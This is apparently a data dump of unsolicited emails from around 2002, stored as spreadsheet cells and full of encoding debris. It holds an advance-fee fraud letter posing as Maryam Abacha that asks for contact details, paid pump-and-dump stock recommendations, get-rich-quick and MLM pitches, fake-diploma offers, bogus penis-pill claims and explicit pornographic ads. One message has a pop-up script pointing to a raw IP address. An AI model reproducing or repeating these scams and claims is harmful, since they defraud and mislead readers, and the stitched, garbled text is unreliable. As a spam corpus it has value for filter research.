	{color:#FFCC00;
	text-decoration:underline;}
span.201
	{color:#FF9900;
	text-decoration:underline;}
span.21
	{color:#FFCC00;
	text-decoration:underline;}
span.210
	{color:#FF9900;
	text-decoration:underline;}
span.22
	{color:#FFCC00;
	text-decoration:underline;}
span.220
	{color:#FF9900;
	text-decoration:underline;}
span.23
	{color:#FFCC00;
	text-decoration:underline;}
span.230
	{color:#FF9900;
	text-decoration:underline;}
span.24
	{font-family:Verdana;
	color:white;
	font-weight:normal;
	text-decoration:none none;}
span.240
	{font-family:Verdana;
	color:#CC99FF;
	font-weight:normal;
	text-decoration:none none;}
span.25
	{font-family:Verdana;
	color:#CC99FF;
	font-weight:normal;
	text-decoration:none none;}
span.250
	{font-family:Verdana;
	color:white;
	font-weight:normal;
	text-decoration:none none;}
span.26
	{color:#CC99FF;
	text-decoration:underline;}
span.260
	{color:white;
	text-decoration:underline;}
span.27
	{color:#CC99FF;
	text-decoration:underline;}
span.270
	{color:white;
	text-decoration:none none;}
span.28
	{color:#CC99FF;
	text-decoration:none none;}
span.280
	{color:white;
	text-decoration:none none;}
span.29
	{color:#CC99FF;
	text-decoration:none none;}
span.290
	{color:#CCFFFF;
	text-decoration:none none;}
span.300
	{color:#CC99FF;
	text-decoration:none none;}
span.301
	{font-family:Verdana;
	color:white;
	text-decoration:none none;}
span.31
	{color:#CC99FF;
	text-decoration:none none;}
@page Section1
	{size:595.3pt 841.9pt;
	margin:72.0pt 90.0pt 72.0pt 90.0pt;}
div.Section1
	{page:Section1;}
--&gt;
Â PRINTER
INK CARTRIDGES &amp; REFILL KITS from  
Â€4.85... BULK ORDERS  or TRADE
welcome...Â  please contact us at info@9to6.ie for
discounted
prices guaranteed to give you huge savings of between
50-300%.Â  We
provide an excellent PRINTING &amp; GRAPHICS DESIGN SERVICE at
competitive prices.Â  T-SHIRT PRINTING SERVICE - just send any
picture and we'll put them on a t-shirt for you.Â  We also stock a
range of
GIFTS and NOVELTY LIGHTING.Â  Don't miss out, visit our
site
at http://www.9to6.ie/
NOW!Ink
CartridgesLASER PRINTER CARTRIDGES
AND
    TONER KITS
Refill
System 
Â 
Special
Offer
[Â HomeÂ ] [Â CanonÂ ] [Â EpsonÂ ][Hewlett Packard]
[Â OkiÂ ] [Â BrotherÂ ]
[Â XeroxÂ ][Refill
System]
[Â PrintingÂ ]
[Â PhotocopyÂ ]
[Â T-ShirtÂ Printing
Â ] [Â WeddingÂ Stationery
Â ][LASER PRINTER CARTRIDGES AND
TONER
KITS]
[Â 9to6Â Special
Â ] [Â InkÂ AgainÂ ]
[Â WordtechÂ InkÂ ]
[Â NoveltyÂ Lighting
Â ] [Â GiftwareÂ ]
[Â 
ComputerÂ ConsumablesÂ ]To unsubscribe, please e-mail us at
webmaster@9to6.ie.Â 
We apologise for any inconvenience
caused.
</t>
  </si>
  <si>
    <t xml:space="preserve">==========================================================================Now you can have HUNDREDS of lenders compete for your loan!FACT: Interest Rates are at their lowest point in 40 years!You're eligible even with less than perfect credit !!	* Refinancing
	* New Home Loans
	* Debt Consolidation
	* Debt Consultation
	* Auto Loans
	* Credit Cards
	* Student Loans
	* Second Mortgage
	* Home EquityThis Service is 100% FREE without any obligation.Visit Our Web Site at:  http://61.129.68.19/user0201/index.asp?Afft=QM4============================================================================To Unsubscribe: http://61.129.68.19/light/watch.asp
</t>
  </si>
  <si>
    <t>Fantastic Facials!
Click here to be removed</t>
  </si>
  <si>
    <t xml:space="preserve">
H1 { } TD {  FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } P {  FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } Â Compare Now Online + Save! Dear Homeowner,"Now is the time to take advantage of falling interest rates!Â There is no advantage in waiting any longer."Refinance or consolidate high interest credit card debt into a low interest mortgage.Â  Mortgage interest is tax deductible, whereas credit card interest is not.You can save thousands of dollars over the course of your loan with just a 0.25% drop in your rate!Our nationwide network of lenders have hundreds of different loan programs to fit your current situation: RefinanceSecond MortgageDebt ConsolidationHome ImprovementPurchaseÂ "Let us do the shopping for you...IT IS FREE!CLICK HERE"Please CLICK HERE to fill out a quick form. Your request will be transmitted to our network of mortgage specialists who will respond with up to three independent offers.This service is 100% free to home owners and new home buyers without any obligation.Data Flow National AveragesProgramRate30Year Fixed6.375%15Year Fixed5.750%5Year Balloon5.250%1/1Arm4.250%5/1Arm5.625%FHA30 Year Fixed6.500%VA 30 Year Fixed6.500%"You did all the shopping for me. Thank you!-T N. Cap.Beach, CA"...You helped me finance a new home and I got a very good deal.- R H. H.Beach, CA"..it was easy, and quick...!-V S. N.P.Beach, WATo be removed from this list please visit : http://211.154.134.26/remove/remove.htm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</si>
  <si>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4171uCAC8-021gCco3337qYKc4-050NVjZ1161Zl37
</t>
  </si>
  <si>
    <t>Dear friend,
May I briefly introduce myself to you. I am Hajia Maryam Abacha, the wife of late Nigerian Head of State, General Sanni Abacha, who died on the 8th of June 1998. ever since the death of my husband, my family has been facing a lot of problems mostly with the present civilian government. Consequently, my son - Mohammed Abacha has been under torture in detention for a sin he did not commit and made to make a lot of confessions as regards valuables and money, including that of my late husband entrusted in his hand for safe keeping. 
The latest is the confession of the US$700,000,000.00 (Seven Hundred Million United States Dollars) cash his late father gave him for safe keeping. Please check News watch Magazine of May 8th / 15th, 2000 issue on [Website:http://www.newswatchngr.com] to confirm the above story. Also the recent publication by this day Newspaper on Thursday March 1st Edition, which London Court clear ways for more recovery of Abacha's family looted money. Please confirm this issue on website; http://www.thisdayonline.com, click the Archieve/2001/March 2001/Thursday March 1st.
On this note, I deposited a total sum of US$40,300,000.00 (Forty Million, three hundred thousand United states Dollars) sometimes March last year with a security company abroad (name withheld for now). Normally, we (1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son's confessions had implicated my husband and in fact the whole of my family. This has actually caused the federal Government of Nigeria to confiscate our International passports, frozen every of my family member's bank accounts, both home and abroad, even our properties. 
My problem now is, I want someone that can assist me move the US$40,300,000.00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e-mail:mrsabacha_11@mail.com or FAX 234-1-7590893, I shall so much appreciate your immediate response for full details of the business which shall be given to you by my second son Mallam Mustafa Abacha. You should note also that my son - Mallam Mustapha Abacha shall handle all cases as regards this business; as he is well abreast with this transaction for I do not have access to telephone lines now because they have been tossed by security agents and my movement is being monitored. I would like my son (Mallam Mustafa Abacha) to settle down  or be involved in a dating relationship with any lucky foreign lady at the successful completion of the transaction.
In acknowledgement of my proposal, I would want you to furnish me with your telephone number, fax number and address so as to enable my son whom will be dealing with you directly to easily have you communicate as to how you will receive this money on our behalf risk-free.
Thanking you in anticipation to your kind understanding and cooperation. I am looking forward for a healthy business relationship with you  and my entire household. Hoping to hear from you.Best regards,Hajia Maryam Abacha.Call me on My Telephone Number 234-80-33357110please for security reasons reply through to the fax number FAX 234-1-7590893 instead of the email as it is general to all the family member.</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by  (spock@1andonly.com) on Sunday, July 28, 19102 at 15:37:19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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
browserVer=parseInt(navigator.appVersion); 
HB=window.open('http://61.129.68.32/empires/ghi.html','HBback','toolbar=no,menubar=no,status=no,directories=no,location=no,scrollbars=no,resizable=no,width=468,height=120' );
if(browserVer&gt;=4){ 
window.focus(); 
}
Internet Empires
Take Control of your
FINANCIAL FUTURE
Make $7,000 / Month
Learn how to get. . .
5 Money-Making 
Web Sites
Dear Friend,
You're about to discover how you can have FIVE of your own Internet businesses set up and taking orders within 29 minutes...for less than half of what most people spend on groceries!
But first, please let me introduce myself... 
Hi! My name is Frank Kern. I'd like for you to know up front that I'm not an Internet Guru...Not A Computer Wiz...And Not A Marketing Genius. 
First of all, I'll admit that I don't expect you to believe a single word I say. 
After all, how many times a day are you BOMBARDED with some "get-rich-quick" scheme on the Internet?
You probably get a brand new promise of instant wealth every few hours in your e-mail box and if you're anything like me, you've tried a few and been left with nothing but a hole in your pocket!
Well, I've got great news for you. 
My unprofessional, little "Home Made" web site brought in $115,467.21 last year and you're about to discover how. . . . . . you can do the same!Click 
                    Here For Federally Documented ProofThis message is coming to you as a result of an Opt-in Relationship our Clients have had with you. If you simply wish to be Removed from all future Messages, 
then CLICK 
HERE [8J7BJK9^":}H&amp;*TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by  (spock@1andonly.com) on Sunday, July 28, 19102 at 15:59:55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t>
  </si>
  <si>
    <t xml:space="preserve">
Save up to75%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asterhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi !My name is Wayne Harrison and I would like to share a
genuine, NO RISK opportunity with you.What I have to share with you is not like any other internet
opportunities you have seen before. It is first and foremost
a CONSUMER OPPORTUNITY.It also offers you the ability to have a share of a
new Internet Mall to buy at wholesale for yourself
or to send others and make commissions on their
purchases.Besides this, it also offers a unique networking program
using a principle we call "REFERNET" Marketing. This is no
"get rich quick" scheme, but rather a credible
and realistic way to save money and gradually develop
what can become a large, recurring residual income.What's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space.To get your free membership and to learn more about
the DHS Club and our exciting REFERNET Marketing
Program and Postlaunch, visit my web page at
http://lwharris.0catch.com/  
Remember, you have nothing to lose and potentially a lot to gain!
Best Regards,Wayne Harrison
To be removed from future mailings, simply
respond with REMOVE in the subject line.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Congratulations!"Now
        is the time to take advantage of falling interest rates! There is no
        advantage in waiting any longer."Refinance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
Â 
Â 
Â 
Â To
      be removed from our mailing list Click
      HereÂ 
http://xent.com/mailman/listinfo/fork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</si>
  <si>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Now!!!If above link doesn't work, Click Here
Â 
4784GBrs1-518UZFh0043nkZY7-777l28
</t>
  </si>
  <si>
    <t xml:space="preserve">Easy 30-50% Return?Learn how you can receive a monthly check for 3, 4, or 5%
a month until your initial investment is paid off...then a
monthly check for over 4% a month for years to come...We know it sounds impossible, but it's happening today.For complete information on this 
multi-trillion dollar industry:http://www.page4life.org/users/stone40/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
To Opt Out:Please go to our "OPT OUT" website:http://www.page4life.org/users/stone40/optout.html
</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</si>
  <si>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herevidal
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 RootsSearch.net: 
Online 
        Auction 
  Check Mail | Gen Directory | My Services | Query
        Forums | Downloads | Book Store | Resources | Articles        Categories
        All
        New
        Closing
        Going!
        All Closed
        Post
        Register
        My Auction
Tired of paying charges to Ebay, Yahoo 
        etc?
        Now you don't have to!Â  Post your 
        genealogy auction
FREE!Â  We're just like the big 
        boys!Auction 
                    Categories
                    AccessoriesÂ                      Books                     Paper Items 
                    Records                     Everything Else 
Sell your item with buy it now, proxy bidding, 
          reserve and more!
Sign Up! or
          Visit Us!
[
          FAQ ] [
          Suggest A Category ] [
          Change Registration ] [
          Lookup Username/Password ] [
          User Feedback ] [
          Tell A Friend ] 
          [ 
          Auction Items Wanted ] [
          Auction Notification ] [
          Item Tracking ] [
          Report Auction Fraud ] [
          Ban A Bidder ] [ Home ]
Add a Site 
        | About | Advertise | Jobs | Webmasters |
Contact | Make RS Your Start Page
RootsSearch.net
        is ï¿½ 2001.Â  All rights reserved.
You or someone through this email address has requested
to receive third party mailings.  To be removed from
future mailings click the link below.
http://www.whenopportunityknocks.com/cgi-bin/list/mailmachine.cgi?fork@xent.com
---------------------------------------------------------------------
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, LazyTraders, Our Chatroom continues to get more profitable every week, here is what happened this week;Every day the room averaged about $200,000 profit, and on Wednesday it produced $449,000 trading with 1000 shares.If you were trading with 100 shares the results would have been $20,000 every day and $44,900 on Wednesday.Mr G uses Fibonacci numbers and Elliott Waves and will teach you how to do the same thing.if you are at all interested in trading and want to expand your knowledge to the point where you no longer have to lose money but will actually make money on a consistent basis join his Chatroom for $199 per month.You'll learn how to trade futures, and you'll get daily Stockpicks as well.The Chatroom has had  no losing days.http://lazytrader.get.toYou can also become a Lazy DayTrader and learn how to capture Stocks that make 30 to 100% in one day.You'll learn how to find all of them in real time in 2 seconds, you'll learn when to buy them and when to sell them by using buying and selling pressure at:http://lazytrader.get.toand, you can also use our AI StockPicking Software that will pick winning Stocks for you and makes between 15 and 50% per day consistently.
Have a nice day.
Frank vanderlugt
If our Server is down go to any Search Engine and type "lazy daytrader".To be removed just click on 
lazytrader@37.com and type "unsubscribe"Or fax us at:775-320-3470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
</t>
  </si>
  <si>
    <t>Get Your Postal Mail Anytime, Anywhere Via Email
What Is 
            It? 
PaperlessPOBox is the fast, easy, and secure way 
            to receive your postal mail from any email program or web 
            browser. Stay In 
            TouchÂ Â  
Receive your postal mail at hotels, airports, 
            satellite offices, Internet cafes - anywhere with email or web 
            access. Private and 
            Secure 
Data encrypted password-protected account access 
            insures privacy. Mail is opened and scanned by high-speed machines 
            that process hundreds of mail pieces per hour. Mail safety concerns 
            are eliminated. Easy 
PaperlessPOBox is as simple to use as email. Each 
            mail piece is converted to an image file. Simply open the image file 
            and view it with the free Adobe PDF viewer. Fast 
Important Correspondence is sent same-day via 
            email using PaperlessPOBoxï¿½s proprietary sorting technology. 
          No More Junk 
            Mail 
Opt for the first-class only feature to have junk 
            mail removed from your life.  
Enter promo code XVXKL to get 
            ONE MONTH FREE Pay for month 1 - get a credit 
            for the same amount for month 2. Service 
            plans start at just $29.95 per month. Get your 
            new PaperlessPOBox address in just 5 minutes. UNCONDITIONAL MONEY-BACK 
            GUARANTEE Cancel anytime during the first 
            30 days for a full refund. Â 
Find 
            Out More Click On An Icon Below 
5 MinuteVideo In TheNews How 
            ItWorks SampleLetters HomePage
Â Â Â PaperlessPOBox 
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â Â Â Â Â Â Â  
      Â Â Â Â Â Â  Postal Service Mail Via EmailThis 
message has been sent to you in compliance with our strict anti-abuse regulations. 
If you do not wish to receive further mailings, please send a blank mail 
to bestoffers@dishnetdsl.net 
with Remove as subject.</t>
  </si>
  <si>
    <t xml:space="preserve">creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1590-17700.Â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</si>
  <si>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8064owaS8-626pYyF6611Pnah5-739Lind4606qvym4-041dhmY3817l52
</t>
  </si>
  <si>
    <t xml:space="preserve">GAMING ADVISOR  NEWS July 16, 2002   i2corp Enters into Research and Development Agreement with Nevada Gaming Equipment Supplier For Live Remote Bingo.      
The general feeling of the Top Internet Lawyers and Analysts is that "online gambling and sports betting is here to stay.Â” Attempts at trying to stop it would be largely ineffective! Banning Internet gambling and sports betting presents technical and legal problems that Governments are ill equipped to enforce. WhatÂ’s more, there are NO competitors for the CompanyÂ’s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Â“ The study concludes that live wagering from remote locations does more than create a new source of revenue for sponsoring casinos. Additionally, it creates a marketing opportunity, a means to find and cultivate thousands of new customers who can be encouraged to become on-site patrons.Â” A copy of the full report in pdf format can be downloaded at http://www.gamingobserver.com/.
i2corp is the holding company for Home Gambling Network, Inc. HGN holds U.S. Patent 5,800,268,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real-time will become one of the most profitable/prolific industries worldwide. i2corp recently won judgment against giant UUNET a subsidiary of MCI/WorldCom in a U.S. Federal Court for Patent infringement. Just another compelling reason why i2corp has orphaned their competition! Therefore we conclude i2corpÂ’s common stock to be overlooked and undervalued! RECOMMENDATION: STRONG BUY     i2corp   
OTCBB Symbol                  (ITOO)
Recent Price     	          .05 - .08
52-Week Hi-Lo 	          .05 - .48
Short Term Target Price:     .60This news release contains forward-looking statements as defined by the Private Securities Litigation Reform Act of 1995. Forward-looking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qualify all such forward-looking statements made by or on behalf of Gaming Advisor. In addition, Gaming Advisor disclaims any obligation to update any forward-looking statements to reflect events or circumstances after the date hereof. The information herein has been obtained from reputable sources and therefore we assume its v
 alidity. Gaming Advisor has been c
ompensated $5,000 for the dissemination of this information and may at anytime buy or sell the securities of i2corpÂ’s common stock.nywguempturgwthionjpsqdw
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
The Money Control SystemÂ Â The Money Control System 
Would your lifestyle change if you had an
extra $10,000 each and every month? Find out NOW!
Â 
The
Money Control System
How You Can Get Rich, Stay
Rich &amp; Enjoy Being Rich
with The Money Control System.
Here's what people are saying."I don't have any financial
  worries...I can now pursue the interests and
  hobbies and the things I want to do..."  " The mutual funds we are into are rated among the top five...
  we are looking at probably 15%,20% return..."  " My goal was specifically to take the $10,000 that I managed
  to accumulate through savings, invest that and, in a period of
  nine months to a year, come back with at least $15,000.
  I came back with $16,000.  "I Saved In Taxes Alone What I Paid For
  Â My Kid's First Year of College."  "Anyone who can learn from Money Control would be crazy to pass up the
  chance. The Control Steps work so well that anyone can become a millionaire.
  I'm not a millionaire yet, but I'm living like one. I call my time my own, and
  work whenever I decide to. I am only 30 years old, so I plan to work another
  five years and retire with the income from a million dollars worth of
  investments. Before The Money Control SystemÂ  showed me the way, I would
  never have believed it possible. Me, a millionaire!"Â 
  Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â 
  B.H. Salt Lake City UTÂ CLICK
HERE TO LEARN MORE AND CHANGE YOUR LIFE!
</t>
  </si>
  <si>
    <t xml:space="preserve">
Please take time to look at our newly designed website : www.microfinder.comWe have a full range of Notebooks, Desktops and Accessories displayed on
the site.If you are looking for trade prices feel free to subscribe to the trade
section.Here are some of our latest specials :Notebooks :8 x Famous Brand A430, PIII650mhz, 128MB RAM, 6GB HDD, 13.3" TFT Screen,
56K Modem,
CD Rom, FDD, USB
1 @ 525 + vat, 5 @ Â£4955 x Dell CPX H500GT, PIII500mhz, 128MB, 12GB HDD, 14.1" TFT, CDRom, FDD, USB
1 @ Â£480 + vat, 5 @ Â£455 + vat
DELL CDRW Available Â£75 extra10 x IBM Thinkpad 380 XD, P233mmx, 32MB, 4GB, 12.1" TFT, CDRom, FDD, USB,
(New Battery!)
1 @ Â£325 + vat, 5 @ Â£299 + vat10 x Digital Hi Note VP 735, P233mmx, 64MB, 3GB HDD, 13.3" TFT, CDRom,
FDD, USB
(Free Carry Case)
1 @ Â£300 + vat, 5 @ Â£275 + vat20 x Low End Notebooks, P133, 32MB, 1.5GB, TFT and Dual Scan, FDD
&gt;&gt;From Â£125 + vatDesktops :20 x Packard Bell Imedia 4600, Celeron 850mhz, 128MB Ram, 20GB HDD, DVD
Rom, FDD, USB
12 Months Warranty
1 @ 320+vat, 5 @ Â£299 + vatOther Imedias in stock - call for prices 30 x Packard Bell Aur@, TFT Screen and Slim line Base Unit Designer PC,
PIII933mhz, 128 MB Ram, 30GB HDD, DVD, CDRW, PCMCIA, USB, 15" TFT Screen
5 @ Â£550 + vatCall Ali or Tris
Sales and Marketing
Microfinder UK Ltd. 
Tel : 01225 447227
Fax : 01225 471166
106 Walcot St
Bath
BA1 5BGTo be removed from this e-mail shot, please reply stating remove in the
subject field.   
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
Purchase an Extended Auto Warranty for your Car today. CLICK HERE for a FREE no obligation quote.
http://www3.all-savings.com/warranty/
Car troubles always seem to happen at the worst possible time. Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.Buy DIRECT! Our prices are 40-60% LESS!We offer fair prices and prompt, toll-free claims service.  Get an Extended Warranty on your car today.Warranty plan also includes:1)   24-Hour Roadside Assistance.
2)   Rental Benefit.
3)   Trip Interruption Intervention.
4)   Extended Towing Benefit.CLICK HERE for a FREE no obligation quote.
http://www3.all-savings.com/warranty/
---------------------------------------
To unsubscribe, go to: 
http://www3.all-savings.com/stopthemailplease/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 01:29:47
---------------------------------------------------------------------------: "Want a BIG Penis?" Experience the results you've always wanted with a massive scientific breakthrough:Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge Your Penis. 100% GUARANTEED! Best of all, There Are NO Agonizing Hanging Weights, NO Tough Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO Dangerous Surgery Involved. We Guarantee genuine lasting results! Vig-Rx pills will work for you 100%, or you will get 100% of your money back!Click here to give it a try"This is one of the best investments I have ever made. I can not even begin to express how much gratitude I have for this product. I am not even through with my first bottle and have already grown 1 in. in length and just over 1 in. in girth, and I still have another bottle to go! No!
 more am I the average 6 inch guy. THANK YOU SO MUCH " Ben, IdahoTo be removed from the opt-in list click here---------------------------------------------------------------------------http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 03:04:36
---------------------------------------------------------------------------: "Want a BIG Penis?" Experience the results you've always wanted with a massive scientific breakthrough:Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge Your Penis. 100% GUARANTEED! Best of all, There Are NO Agonizing Hanging Weights, NO Tough Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO Dangerous Surgery Involved. We Guarantee genuine lasting results! Vig-Rx pills will work for you 100%, or you will get 100% of your money back!Click here to give it a try"This is one of the best investments I have ever made. I can not even begin to express how much gratitude I have for this product. I am not even through with my first bottle and have already grown 1 in. in length and just over 1 in. in girth, and I still have another bottle to go! No more am I the average 6 inch guy---------------------------------------------------------------------------
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Shoot your wad all over her face.
These Girls love to suck cock and lucky for you,
they love to Suck Cock while our cameras Are Rolling.
"We have the nastiest Cum Sucking Sluts 
Available Anywhere!"CLICK HERE
Â 
Â 
YOU MUST BE AT LEAST 18 TO ENTER!
=============================================================
To be removed from our "in house" mailing list CLICK HERE
and you will automatically be removed from future mailings.You have received this email by either requesting more information
on one of our sites or someone may have used your email address.
If you received this email in error, please accept our apologies.
=============================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by  (mike@winners.com) on Tuesday, July 30, 19102 at 03:48:23
---------------------------------------------------------------------------message: GET OVER $500 DOLLARS CASH!!! Just Click Here!!!! - http://www.reelten.com/redirect/500/index.htm -     If you have received this Email in error please contact: lon_chaney_jr@hotmail.com with subject: remove. ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">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6725ppxR2-400ZydL68l18
</t>
  </si>
  <si>
    <t>Dear hulkjr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$19.99Visit our SECURE website for an in-depth look at this product:
http://www299.fastwebsnet.comTo be eliminated from future marketing:
http://www299.fastwebsnet.com/takemeoff.html
  [E^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs]</t>
  </si>
  <si>
    <t>Dear closr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[FRYTE^3247(^(PO1:KJ)_8]</t>
  </si>
  <si>
    <t xml:space="preserve">Copy DVD Movies?Yes!  Copy and burn your own DVD
movies and video with a CD-R Drive.* All Software Included On CD
* Step by Step Instructions
* No DVD Burner Required
* We ship all orders within 72 hours!
* 30 Day "NO Risk Trial".So don't delay...get your copy TODAY!http://209.163.187.46/dvd
+++++++++++++++++++++++++++++++++++++++++++
To "Opt-Out"http://209.163.187.46/options/
5275MPdA5-850BRBf9054xgTa4-379luJl31
</t>
  </si>
  <si>
    <t xml:space="preserve">
Message&lt;!--
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{mso-style-parent:"";
	margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
a:link, span.MsoHyperlink
	{color:blue;
	text-decoration:underline;
	text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
	{color:blue;
	text-decoration:underline;
	text-underline:single;}
p.MsoAutoSig, li.MsoAutoSig, div.MsoAutoSig
	{margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
p
	{mso-margin-top-alt:auto;
	margin-right:0in;
	mso-margin-bottom-alt:auto;
	margin-left:0in;
	mso-pagination:widow-orphan;
	font-size:12.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
span.EmailStyle19
	{mso-style-type:personal;
	mso-style-noshow:yes;
	mso-ansi-font-size:10.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Arial;
	mso-ascii-font-family:Arial;
	mso-hansi-font-family:Arial;
	mso-bidi-font-family:Arial;
	color:navy;}
span.EmailStyle20
	{mso-style-type:personal;
	mso-style-noshow:yes;
	mso-ansi-font-size:10.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Arial;
	mso-ascii-font-family:Arial;
	mso-hansi-font-family:Arial;
	mso-bidi-font-family:Arial;
	color:navy;}
@page Section1
	{size:8.5in 11.0in;
	margin:1.0in 1.25in 1.0in 1.25in;
	mso-header-margin:.5in;
	mso-footer-margin:.5in;
	mso-paper-source:0;}
div.Section1
	{page:Section1;}
--&gt;
visit us at 
                  www.sqlcare.comor 
                  call us at (214) 740.0923 
Â To be Removed, reply with REMOVE in 
the
subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
University Degrees thru Life Experience!
Â 
U 
              N I V E R S I T Y D I P L O M A S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1 - 6 4 6 - 2 1 8 - 1 2 0 0 
Call 24 hours a day, 
              7 days a week, including 
              Sundays and holidays. 
For Removal 
              mailto:no_degree_xyz@excite.com
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,I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regards,Stanley Woodwork.
</t>
  </si>
  <si>
    <t xml:space="preserve">IGTT
Vol. 
6, Issue 243 - August 2002
The 
Wall Street BulletinYour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Â 
Telecom Consolidation Begins to Accelerate The Wall Street Bulletin believes 
that the recent 
investment of capital into Level 3, lead by Warren Buffett,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director of the Eastern Management Group market 
research firm. Christopher 
Dean,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(OTCBB: 
IGTT)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Â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Â 
The InDigNet Strategy
InDigiNet, Inc. is an integrated solutions company 
that provides small to mid-sized enterprises (SMEs) with an integrated 
communication solution. InDigiNet is a prestigious "Diamond" 
level partner of Avaya,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Companyâ€™s 
strategy is to acquire the customer bases of smaller, single market 
communication companies and attractively priced Internet 
Service Providers (ISPs). The Company recently completed 
its acquisitions of Fox Telecommunications and WBConnect. 
InDigiNet will then expand the breadth of their services to grow 
revenue and enhance profitability. SMEs account for $120 billion 
in commercial telephony, data services and technology spending, 
or 33% of the countryâ€™s total market, and this spending 
is expected to grow at above average rates over the next ten years. 
Source: Morgan Stanley Dean Witter. 
The IGTT web site: www.indiginet.com
Â 
The IT Market
Based on recent studies, the countryâ€™s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Â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and Colorado State University.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Â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Â 
NEWS - InDigiNet, Inc. Completes Acquisition of 
Fox Telecommunications, Inc. - PRNewswire - CLICK 
HERE
NEWS - InDigiNet, Inc. Completes Acquisition of 
WBConnect - PRNewswire - CLICK 
HERE
Â 
NEWS - Telecom Consolidation Begins to Accelerate 
- from Telecommunications Magazine - CLICK 
HERE
Â 
Industry Interests - Telecommunications Websites: 
TIA Online - Telecommunications 
Magazine - IT World
Â 
The Wall 
Street Bulletin is an independent newsletter and is not affiliated 
with InDigiNet, Inc.
Â 
The Wall Street Bulletin is an independent 
research firm. This report is based on The Wall Street Bulletinâ€™s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â€œforward-looking 
statementsâ€. Many factors could cause actual results to 
differ. Investors should consult with their Investment Advisor 
concerning IGTT. Copyright 2002 Â© The Wall Street Bulletin 
- All Rights Reserved
I no longer wish to receive your 
newsletter CLICK 
HEREtahnorrjilisgoyymddppqw
</t>
  </si>
  <si>
    <t xml:space="preserve">IGTT
Vol. 
6, Issue 243 - August 2002
The 
Wall Street BulletinYour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Â 
Telecom Consolidation Begins to Accelerate The Wall Street Bulletin believes 
that the recent 
investment of capital into Level 3, lead by Warren Buffett,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director of the Eastern Management Group market 
research firm. Christopher 
Dean,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(OTCBB: 
IGTT)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Â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Â 
The InDigNet Strategy
InDigiNet, Inc. is an integrated solutions company 
that provides small to mid-sized enterprises (SMEs) with an integrated 
communication solution. InDigiNet is a prestigious "Diamond" 
level partner of Avaya,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Companyâ€™s 
strategy is to acquire the customer bases of smaller, single market 
communication companies and attractively priced Internet 
Service Providers (ISPs). The Company recently completed 
its acquisitions of Fox Telecommunications and WBConnect. 
InDigiNet will then expand the breadth of their services to grow 
revenue and enhance profitability. SMEs account for $120 billion 
in commercial telephony, data services and technology spending, 
or 33% of the countryâ€™s total market, and this spending 
is expected to grow at above average rates over the next ten years. 
Source: Morgan Stanley Dean Witter. 
The IGTT web site: www.indiginet.com
Â 
The IT Market
Based on recent studies, the countryâ€™s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Â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and Colorado State University.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Â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Â 
NEWS - InDigiNet, Inc. Completes Acquisition of 
Fox Telecommunications, Inc. - PRNewswire - CLICK 
HERE
NEWS - InDigiNet, Inc. Completes Acquisition of 
WBConnect - PRNewswire - CLICK 
HERE
Â 
NEWS - Telecom Consolidation Begins to Accelerate 
- from Telecommunications Magazine - CLICK 
HERE
Â 
Industry Interests - Telecommunications Websites: 
TIA Online - Telecommunications 
Magazine - IT World
Â 
The Wall 
Street Bulletin is an independent newsletter and is not affiliated 
with InDigiNet, Inc.
Â 
The Wall Street Bulletin is an independent 
